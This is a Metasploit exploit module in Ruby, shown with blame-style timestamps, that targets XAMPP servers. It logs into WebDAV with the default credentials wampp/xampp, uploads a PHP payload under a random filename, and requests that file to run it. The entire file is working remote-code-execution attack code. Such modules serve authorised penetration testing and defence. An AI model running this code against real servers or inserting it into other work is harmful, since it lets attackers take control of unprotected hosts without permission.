2012-01-06 20:00:14 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2012-01-06 20:00:14 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::EXE
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'XAMPP WebDAV PHP Upload',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits weak WebDAV passwords on XAMPP servers.
|
2012-02-11 01:44:03 +00:00
|
|
|
It uses supplied credentials to upload a PHP payload and
|
2012-01-06 20:00:14 +00:00
|
|
|
execute it.
|
|
|
|
},
|
2012-03-05 20:28:23 +00:00
|
|
|
'Author' => ['thelightcosine <thelightcosine[at]metasploit.com>'],
|
2012-01-06 20:00:14 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Automatic', { } ],
|
|
|
|
],
|
2012-02-01 02:38:05 +00:00
|
|
|
'DisclosureDate' => 'Jan 14 2012',
|
2012-01-06 20:00:14 +00:00
|
|
|
'DefaultTarget' => 0
|
|
|
|
)
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
|
|
|
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
|
|
|
OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']),
|
|
|
|
OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp'])
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
uri = build_path
|
|
|
|
print_status "Uploading Payload to #{uri}"
|
|
|
|
res,c = send_digest_request_cgi({
|
|
|
|
'uri' => uri,
|
|
|
|
'method' => 'PUT',
|
|
|
|
'data' => payload.raw,
|
|
|
|
'DigestAuthUser' => datastore['RUSER'],
|
|
|
|
'DigestAuthPassword' => datastore['RPASS']
|
|
|
|
}, 25)
|
|
|
|
unless (res.code == 201)
|
|
|
|
print_error "Failed to upload file!"
|
|
|
|
return
|
|
|
|
end
|
|
|
|
print_status "Attempting to execute Payload"
|
|
|
|
res = send_request_cgi({
|
|
|
|
'uri' => uri,
|
|
|
|
'method' => 'GET'
|
|
|
|
}, 20)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def build_path
|
|
|
|
if datastore['PATH'][0,1] == '/'
|
|
|
|
uri_path = datastore['PATH'].dup
|
|
|
|
else
|
|
|
|
uri_path = '/' + datastore['PATH'].dup
|
|
|
|
end
|
|
|
|
uri_path << '/' unless uri_path.ends_with?('/')
|
|
|
|
if datastore['FILENAME']
|
|
|
|
uri_path << datastore['FILENAME']
|
|
|
|
uri_path << '.php' unless uri_path.ends_with?('.php')
|
|
|
|
else
|
|
|
|
uri_path << Rex::Text.rand_text_alphanumeric(7)
|
|
|
|
uri_path << '.php'
|
|
|
|
end
|
|
|
|
return uri_path
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|